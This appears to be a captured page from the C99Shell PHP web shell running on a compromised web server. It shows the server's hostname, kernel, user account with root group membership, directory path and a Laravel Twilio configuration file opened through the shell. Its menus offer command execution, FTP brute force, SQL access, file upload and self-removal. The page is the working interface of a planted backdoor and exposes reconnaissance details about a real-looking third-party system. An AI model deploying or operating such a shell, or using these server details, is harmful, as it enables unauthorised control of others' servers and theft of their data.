!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/wataxi.picotech.app/public_html/config/   drwxr-xr-x
Free 28.36 GB of 117.98 GB (24.04%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     twilio-notification-channel.php (1.31 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

return [
    
'username' => env('TWILIO_USERNAME'), // optional when using auth token
    
'password' => env('TWILIO_PASSWORD'), // optional when using auth token
    
'auth_token' => env('TWILIO_AUTH_TOKEN'), // optional when using username and password
    
'account_sid' => env('TWILIO_ACCOUNT_SID'),

    
'from' => env('TWILIO_FROM'), // optional
    
'alphanumeric_sender' => env('TWILIO_ALPHA_SENDER'),

    
/**
     * Specify a number where all calls/messages should be routed. This can be used in development/staging environments
     * for testing.
     */
    
'debug_to' => env('TWILIO_DEBUG_TO'),

    
/**
     * If an exception is thrown with one of these error codes, it will be caught & suppressed.
     * To replicate the 2.x behaviour, specify '*' in the array, which will cause all exceptions to be suppressed.
     * Suppressed errors will not be logged or reported, but the `NotificationFailed` event will be emitted.
     *
     * @see https://www.twilio.com/docs/api/errors
     */
    
'ignored_error_codes' => [
        
21608// The 'to' phone number provided is not yet verified for this account.
        
21211// Invalid 'To' Phone Number
        
21614// 'To' number is not a valid mobile number
        
21408// Permission to send an SMS has not been enabled for the region indicated by the 'To' number
    
],
];

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0066 ]--